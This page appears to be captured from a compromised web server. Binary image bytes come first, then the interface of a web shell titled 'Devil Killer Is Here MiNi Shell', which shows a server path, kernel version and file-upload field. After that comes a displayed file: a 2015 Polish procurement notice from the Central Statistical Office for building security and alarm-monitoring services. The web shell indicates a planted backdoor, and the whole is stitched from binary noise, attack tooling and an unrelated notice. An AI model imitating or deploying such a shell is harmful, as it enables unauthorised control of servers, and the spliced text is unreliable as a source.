JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151104/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151104/296630-N-2015.html

<p class="kh_header"><b>Warszawa: Usługi ochrony budynków Głównego Urzędu Statystycznego</b><br>
<b>Numer ogłoszenia: 296630 - 2015; data zamieszczenia: 04.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Główny Urząd  Statystyczny , Al. Niepodległości 208, 00-925 Warszawa, woj. mazowieckie, tel. 22 6083539, faks 22 6083189.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.stat.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi ochrony budynków Głównego Urzędu Statystycznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usługi ochrony budynków Głównego Urzędu Statystycznego. Przedmiot zamówienia obejmuje 2 części: 1) część nr 1 - Ochrona fizyczna budynku Głównego Urzędu Statystycznego z siedzibą w Warszawie przy al. Niepodległości 208 wraz z przyległym do niego terenem. W ramach świadczenia usługi ochrony objętej częścią nr 1 zamówienia, wykonawca zobowiązany będzie do: 1) skierowania do ochrony obiektu pracowników ochrony posiadających: a) szef zmiany ochrony - uprawnienia kwalifikowanego pracownika ochrony fizycznej posiadającego poświadczenie bezpieczeństwa dopuszczające do informacji niejawnych o klauzuli co najmniej poufne; b) pozostali pracownicy - upoważnienie do dostępu do informacji niejawnych o klauzuli zastrzeżone; c) wszyscy pracownicy - aktualne zaświadczenia o odbytym szkoleniu w zakresie ochrony informacji niejawnych; 2) zainstalowania na kosz własny urządzeń rejestrujących obchody pracowników ochrony; 3) całodobowej ochrony zewnętrznej i wewnętrznej obiektu mającej na celu zabezpieczenie mienia Zamawiającego oraz mienia powierzonego Zamawiającemu przed kradzieżą, włamaniem i dewastacją; 4) zapewnienia całodobowego stanu gotowości grupy interwencyjnej do podjęcia czynnych działań w przypadkach napaści lub włamania, w czasie zadeklarowanym przez wykonawcę w ofercie przetargowej; 5) dozorowania bramek kontroli dostępu oraz antynapadowych i antywłamaniowych urządzeń monitorujących, za pomocą urządzeń zainstalowanych w pomieszczeniu pełnienia służby ochrony; 6) kontrolowania osób wchodzących i wychodzących z budynku GUS; 7) wydawania i przyjmowania kluczy do pomieszczeń; 8) informowania pracowników Zamawiającego o zgłaszających się do nich interesantach, prowadzenia ewidencji gości oraz wydawania zastępczych identyfikatorów (kart magnetycznych); 9) obsługiwania wind dla osób niepełnosprawnych przy bramkach kontroli dostępu w wejściu głównym; 10) dozorowania pomieszczeń kas GUS, Centrum Informatyki Statystycznej i Zakładu Wydawnictw Statystycznych; 11) obsługi systemu telewizji przemysłowej; 12) dozorowania i obsługiwania systemu alarmowo-pożarowego, a w szczególności pomieszczeń drukarni, składnicy druków, Centralnej Biblioteki Statystycznej (CBS), czytelni CBS, archiwów, pomieszczeń Centralnego Informatorium Statystycznego, serwerowni, garaży; 13) wezwania, w sytuacji zagrożenia, odpowiednich służb - policji, straży pożarnej, pogotowia ratunkowego i wodociągowego, służb Stołecznego przedsiębiorstwa Energetyki Cieplnej lub innych; 14) obsługiwania głównych wyłączników prądu, centralnego ogrzewania i wody 
- w sytuacjach awaryjnych wymagających interwencji; 15)	dozorowania pomieszczeń, w których wykonywane były prace spawalnicze zarejestrowane w książce prac spawalniczych lub inne prace z otwartym ogniem po opuszczeniu tych pomieszczeń przez osoby wykonujące te prace; 16) opracowania i przedłożenia do zatwierdzenia przez Zamawiającego Instrukcji Ochrony GUS zawierającej: a) zadania pracowników wyznaczonych do ochrony obiektu GUS; b) zasady postępowania pracowników ochrony w przypadku wystąpienia zagrożeń oraz awarii technicznych; c) szczegółowe zakresy obowiązków pracowników ochrony na poszczególnych posterunkach; d) określenie sposobu postępowania pracowników ochrony w przypadku zagrożeń przeciwko zdrowiu i mieniu; e) określenie sposobu postępowania pracowników ochrony w przypadku naruszeniu przepisów o ochronie informacji niejawnych; 17) zatrudnienia do realizacji usługi ochrony, w ramach realizacji klauzuli społecznej, zgodnie z art. 29 ust. 4 ustawy, co najmniej 1 osoby bezrobotnej przez cały okres realizacji zamówienia w pełnym wymiarze czasu pracy, tj.: okres nie krótszy niż do dnia 30 listopada 2016 r.
2) część nr 2: Usługi ochrony w zakresie monitorowania systemu alarmowego zainstalowanego w ośrodku Goplana z siedzibą w Świnoujściu przy ul. Żeromskiego 6. W ramach świadczenia usługi ochrony objętej częścią nr 2 zamówienia, wykonawca zobowiązany będzie do: 1) zainstalowania na koszt własny w ośrodku Goplana lokalnego systemu alarmowego; 2) utrzymania w pełnej sprawności lokalnego systemu alarmowego poprzez dokonywanie czynności konserwacyjnych i napraw bieżących; 3) całodobowego monitorowania lokalnego systemu alarmowego polegającego na przyjmowaniu informacji o zdarzeniach i stanie chronionego obiektu; 4) przekazywania informacji o zdarzeniach osobom upoważnionym przez Zamawiającego; 5) wezwania, w sytuacji zagrożenia, odpowiednich służb - policji, straży pożarnej, pogotowia ratunkowego i wodociągowego, służb Przedsiębiorstwa Energetyki Cieplnej lub innych; 6) podjęcia niezbędnych działań zmierzających do: a) zminimalizowania skutków włamania lub napadu; b) ujęcia w obiekcie lub jego pobliżu osób, które dopuściły się zamachu na chronione dobro; c) ochrony obiektu w przypadku naruszenia jego zabezpieczenia (wybicie szyby, wyłamanie drzwi itp.) do czasu przybycia przedstawiciela Zamawiającego; d) zabezpieczenia dowodów świadczących o popełnieniu przestępstwa, prowadzącego do powstania szkody w majątku Zamawiającego; 7) zapewnienia całodobowego stanu gotowości grupy interwencyjnej do podjęcia czynnych działań w przypadkach napaści lub włamania; 8) zatrudnienia do realizacji usługi ochrony, zgodnie z art. 29 ust. 4 ustawy, co najmniej 1 osoby na umowę o pracę w pełnym wymiarze czasu pracy, przez cały okres realizacji zamówienia, tj.: na okres nie krótszy niż do dnia 30 listopada 2016 r.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 79.71.10.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 11.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> I. Wadium należy wnieść przed upływem terminu składania ofert w kwocie: 1) dla części nr 1: 6.000,00 zł (słownie: sześć tysięcy złotych), 2) dla części nr 2: 150,00 zł (słownie: sto pięćdziesiąt złotych). Wadium wniesione w pieniądzu będzie wniesione skutecznie, jeżeli rachunek bankowy zostanie uznany kwotą wadium przed upływem terminu składania ofert. Niewniesienie wadium lub wniesienie wadium po terminie składania ofert spowoduje wykluczenie wykonawcy z postępowania. Wadium należy wnieść w jednej lub kilku formach przewidzianych w art. 45 ust.6 ustawy: 1) pieniądzu; 2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; 3) gwarancjach bankowych; 4) gwarancjach ubezpieczeniowych; 5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275 z późn. zm.). II. Zamawiający będzie żądał od wybranego w postępowaniu o udzielenie zamówienia wykonawcy wniesienia zabezpieczenia należytego wykonania umowy, w wysokości 10% wartości umowy 1) dla części nr 1 w wysokości 10% wartości umowy z VAT, 2) dla części nr 2 w wysokości 10% wartości umowy z VAT. Zabezpieczenie należytego wykonania umowy należy wnieść przed zawarciem umowy w jednej lub kilku następujących formach: 1) pieniądzu, 2) poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, jako poręczeniach pieniężnych, 3) poręczeniach bankowych, 4) gwarancjach bankowych, 5) gwarancjach ubezpieczeniowych, 6) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275 z późn. zm.)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) dla części nr 1: Zamawiający uzna ten warunek za spełniony, jeżeli wykonawca wykaże, że posiada aktualną koncesję na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia, uzyskaną zgodnie z ustawą z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (Dz. U. z 2005 r. Nr 145, poz. 1221, z późn. zm.). Zamawiający dokona oceny spełniania ww. warunku na podstawie informacji, o której mowa w pkt III.4.1. 
2) dla części nr 2: Zamawiający uzna ten warunek za spełniony, jeżeli wykonawca wykaże, że posiada aktualną koncesję na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia, uzyskaną zgodnie z ustawą z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (Dz. U. z 2005 r. Nr 145, poz. 1221, z późn. zm.). Zamawiający dokona oceny spełniania ww. warunku na podstawie informacji, o której mowa w pkt III.4.1.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) dla części nr 1: Zamawiający uzna ten warunek za spełniony, jeżeli wykonawca wykaże, że należycie wykonał w ostatnich trzech latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 usługę ochrony osób i mienia w budynku o powierzchni nie mniejszej niż 20.000 m2, a wartość tej usługi wyniosła co najmniej 180.000,00 zł brutto. Zamawiający dokona oceny spełniania ww. warunku na podstawie informacji, o której mowa w pkt III.4.1. 
2) dla części nr 2: Zamawiający uzna ten warunek za spełniony, jeżeli wykonawca wykaże, że należycie wykonał w ostatnich trzech latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 1 usługę ochrony mienia w budynku o powierzchni nie mniejszej niż 300 m2, a wartość tej usługi wyniosła co najmniej 5.000,00 zł brutto. Zamawiający dokona oceny spełniania ww. warunku na podstawie informacji, o której mowa w pkt III.4.1.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) dla części nr 1: Zamawiający uzna warunek za spełniony na podstawie oświadczenia, o spełnianiu warunków udziału w postępowaniu, według formuły spełnia/nie spełnia.
2) dla części nr 2: Zamawiający uzna warunek za spełniony na podstawie oświadczenia, o spełnianiu warunków udziału w postępowaniu, według formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) dla części nr 1: Zamawiający uzna ten warunek za spełniony, jeżeli wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę co najmniej 200.000,00 zł. Zamawiający dokona oceny spełniania ww. warunku na podstawie informacji, o której mowa w pkt III.4.1. 
2) dla części nr 2: Zamawiający uzna warunek za spełniony na podstawie oświadczenia, o spełnianiu warunków udziału w postępowaniu, według formuły spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1) dla części nr 1: 1. Wszelkie zmiany Umowy wymagają formy pisemnego aneksu pod rygorem nieważności. 2. Strony przewidują możliwość zmiany treści Umowy w przypadku, gdy: 1) nastąpiła zmiana przepisów prawa powszechnie obowiązującego, która ma wpływ na termin lub zakres realizacji Usługi ochrony lub Umowy; 2) gdy niezbędna jest zmiana sposobu wykonania zobowiązania, o ile zmiana taka jest korzystna dla Zamawiającego oraz konieczna w celu prawidłowego wykonania Usługi ochrony; 3)	gdy niezbędne jest zmniejszenie zakresu Usługi ochrony z uwagi na decyzje podjęte przez organ nadzorujący Zamawiającego. 3. Strona wnosząca o zmianę Umowy zobowiązana jest do przekazania na piśmie warunków zmiany wraz z uzasadnieniem w terminie 2 dni od daty zaistnienia okoliczności lub na 5 dni od proponowanego terminu wprowadzenia zmiany. 
2) dla części nr 2: 1.Wszelkie zmiany Umowy wymagają formy pisemnego aneksu pod rygorem nieważności. 2. Strony przewidują możliwość zmiany treści Umowy w przypadku, gdy: 1) nastąpiła zmiana przepisów prawa powszechnie obowiązującego, która ma wpływ na termin lub zakres realizacji Usługi ochrony lub Umowy; 2) niezbędna jest zmiana sposobu wykonania zobowiązania, o ile zmiana taka jest korzystna dla Zamawiającego oraz konieczna w celu prawidłowego wykonania Usługi ochrony; 3) niezbędne jest zmniejszenie zakresu Usługi ochrony z uwagi na decyzje podjęte przez organ nadzorujący Zamawiającego. 3. Strona wnosząca o zmianę Umowy zobowiązana jest do przekazania na piśmie warunków zmiany wraz z uzasadnieniem w terminie 2 dni od daty zaistnienia okoliczności lub na 5 dni od proponowanego terminu wprowadzenia zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.stat.gov.pl/ogloszenia/zamowienia-publiczne/przetargi/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Główny Urząd Statystyczny, 00-925 Warszawa, al.Niepodległości 208, pok.215.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.11.2015 godzina 10:00, miejsce: Główny Urząd Statystyczny, 00-925 Warszawa, al.Niepodległości 208, pok.215.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Termin realizacji zamówienia publicznego: 1)	dla części nr 1: Wykonawca zrealizuje Umowę w terminie od dnia jej podpisania, jednak nie wcześniej niż od dnia 1 stycznia 2016 do dnia 30 listopada 2016 r. 2) dla części nr 2: Wykonawca zrealizuje Umowę w terminie od dnia jej podpisania, jednak nie wcześniej niż od dnia 1 stycznia 2016 do dnia 30 listopada 2016 r.
2. Wizja lokalna: 1) dla części nr 1: W dniu 12 listopada 2015 r. o godz. 10:00 w budynku Głównego Urzędu Statystycznego w Warszawie przy al. Niepodległości 208 odbędzie się zebranie wykonawców w celu dokonania wizji lokalnej. Zbiórka wykonawców w hallu głównym przy recepcji. 2) W dniu 12 listopada 2015 r. o godz. 10:00 w budynku ośrodka Goplana w Świnoujściu przy ul. Żeromskiego 6 odbędzie się zebranie wykonawców w celu dokonania wizji lokalnej. Zbiórka wykonawców przed wejściem głównym do budynku ośrodka.
3. Klauzula społeczna: dla części nr 1) Wykonawca zatrudni do realizacji usługi ochrony, w ramach realizacji klauzuli społecznej, zgodnie z art. 29 ust. 4 ustawy, co najmniej 1 osobę bezrobotną przez cały okres realizacji zamówienia w pełnym wymiarze czasu pracy, tj.: okres nie krótszy niż do dnia 30 listopada 2016 r. dla części nr 2) Wykonawca zatrudni do realizacji usługi ochrony, zgodnie z art. 29 ust. 4 ustawy, co najmniej 1 osobę na umowę o pracę w pełnym wymiarze czasu pracy, przez cały okres realizacji zamówienia, tj.: na okres nie krótszy niż do dnia 30 listopada 2016 r.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Ochrona fizyczna budynku Głównego Urzędu Statystycznego z siedzibą 
w Warszawie przy al. Niepodległości 208 wraz z przyległym do niego terenem.</p>
